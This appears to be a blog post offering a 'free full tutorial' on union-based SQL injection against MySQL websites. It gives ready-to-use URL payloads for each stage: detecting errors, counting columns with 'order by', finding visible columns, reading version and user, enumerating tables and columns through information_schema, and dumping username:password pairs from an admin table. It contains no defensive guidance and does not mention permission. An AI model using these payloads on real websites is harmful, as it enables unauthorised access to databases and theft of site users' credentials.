SQL INJWCTION CODE ATTACK FREE FULL TUTORIAL

SQL  INJECTION CODE ATTACK  FULL TUTORIAL FOR FREE                                  .                                        .                KNOW FREE  ABOUT  SQL INJECTION IN MySQL DATABASES:-
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
🔘Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
http://www.site.com/page=1
or
http://www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ‘ after the number in the url. 〰>For example:
http://www.site.com/page=1′
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning:🔻 mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
🔘Step 2
Now we need to find the number of union columns in the database. We do this using the “order by” command. We do this by entering “order by 1–“, “order by 2–” and so on until we receive a page error. For example:〰>
http://www.site.com/page=1 order by 1–
http://www.site.com/page=1 order by 2–
http://www.site.com/page=1 order by 3–
http://www.site.com/page=1 order by 4–
http://www.site.com/page=1 order by 5–
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on “order by 9” then we would have 8 columns. If this does not work, instead of — after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
🔘Step 3
We now are going to use the “union” command to find the vulnerable columns. So we enter after the url, union all select (number of columns)–,
for example:〰
http://www.site.com/page=1 union all select 1,2,3,4–
This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7– If this is done successfully the page should show a couple of numbers somewhere on the page.〰 For example, 2 and 3. This means columns 2 and 3 are vulnerable.
🔘Step 4
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try…
@@user
@@version
@@database
For example the url would look like:
http://www.site.com/page=1 union all select 1,user(),version(),4–
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
🔻IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
🔘Step 5
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
🔻UNION SELECT 1,table_name,3,4 FROM information_schema.tables–
So the url would look like:
http://www.site.com/page=1 🔻UNION SELECT 1,table_name,3,4 FROM information_schema.tables–
Remember the ➿“table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
🔘Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
So the url would look like this:
http://www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
🔘Step 7
Finally we need to dump the data, so say we want to get the “username” and “password” fields, from table “admin” we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin–
So the url would look like this:  〰
http://www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin–
Here the “concat” command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.🌐           ….    👍🏾   DONT FORGET TO SUBSCRIBE YOUR EMAIL FOR NEW UPDATE…..